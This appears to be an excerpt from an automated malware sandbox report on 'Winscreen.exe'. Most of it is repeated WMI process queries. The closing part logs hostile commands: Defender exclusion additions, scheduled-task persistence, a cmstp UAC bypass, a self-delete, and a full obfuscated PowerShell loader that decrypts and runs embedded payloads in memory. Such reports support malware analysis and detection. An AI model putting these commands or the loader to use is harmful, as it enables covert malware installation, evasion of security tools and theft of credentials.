                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "smartscreen.exe")
                        Source: C:\Users\user\Desktop\Winscreen.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\Winscreen.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: tmpAA8B.tmp.dat.43.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: Winscreen.exeReversingLabs: Detection: 34%
                        Source: Winscreen.exeVirustotal: Detection: 41%
                        Source: unknownProcess created: C:\Users\user\Desktop\Winscreen.exe "C:\Users\user\Desktop\Winscreen.exe"
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /F /TN "explorer" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\explorer.exe" /RL HIGHEST
                        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe "C:\Users\user\AppData\Roaming\explorer.exe"
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /F /TN "upx" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\upx.exe" /RL HIGHEST
                        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Roaming\upx.exe "C:\Users\user\AppData\Roaming\upx.exe"
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\taskmoder.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\xtm5g4p2.inf
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start C:\Windows\temp\ydztkyrb.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\upx.exe C:\Users\user\AppData\Roaming\upx.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\ydztkyrb.exe C:\Windows\temp\ydztkyrb.exe
                        Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /IM cmstp.exe /F
                        Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\05mor1jc.inf
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start C:\Windows\temp\swtpd1aw.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\swtpd1aw.exe C:\Windows\temp\swtpd1aw.exe
                        Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /IM cmstp.exe /F
                        Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /F /TN "taskmoder" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\taskmoder.exe" /RL HIGHEST
                        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Roaming\taskmoder.exe "C:\Users\user\AppData\Roaming\taskmoder.exe"
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Local\Temp\taskmen.exe "C:\Users\user\AppData\Local\Temp\taskmen.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\taskmoder.exe C:\Users\user\AppData\Roaming\taskmoder.exe
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess created: C:\Windows\Client.exe "C:\Windows\Client.exe"
                        Source: C:\Windows\Client.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe"
                        Source: C:\Windows\Client.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe"
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Windows\fail.bat"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bsr0ba9vyRObkmxsgk+/KMsTtEAihtJSkhdfy6hSUIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSb4Zwde0fSbMLarzeaYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KSZHY=New-Object System.IO.MemoryStream(,$param_var); $WxRgU=New-Object System.IO.MemoryStream; $CTAHr=New-Object System.IO.Compression.GZipStream($KSZHY, [IO.Compression.CompressionMode]::Decompress); $CTAHr.CopyTo($WxRgU); $CTAHr.Dispose(); $KSZHY.Dispose(); $WxRgU.Dispose(); $WxRgU.ToArray();}function execute_function($param_var,$param2_var){ $aTurZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxyRp=$aTurZ.EntryPoint; $kxyRp.Invoke($null, $param2_var);}$iIPOn = 'C:\Windows\fail.bat';$host.UI.RawUI.WindowTitle = $iIPOn;$JhMMH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($iIPOn).Split([Environment]::NewLine);foreach ($ELdqw in $JhMMH) { if ($ELdqw.StartsWith('nZYsDSkVsFscZBoRZGdc')) { $wHkKi=$ELdqw.Substring(20); break; }}$payloads_var=[string[]]$wHkKi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Client (1).vmp.exe "C:\Users\user\AppData\Roaming\Client (1).vmp.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Client (1).vmp.exe "C:\Users\user\AppData\Roaming\Client (1).vmp.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\taskmoder.exe "C:\Users\user\AppData\Roaming\taskmoder.exe"
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "taskmoder.exe"
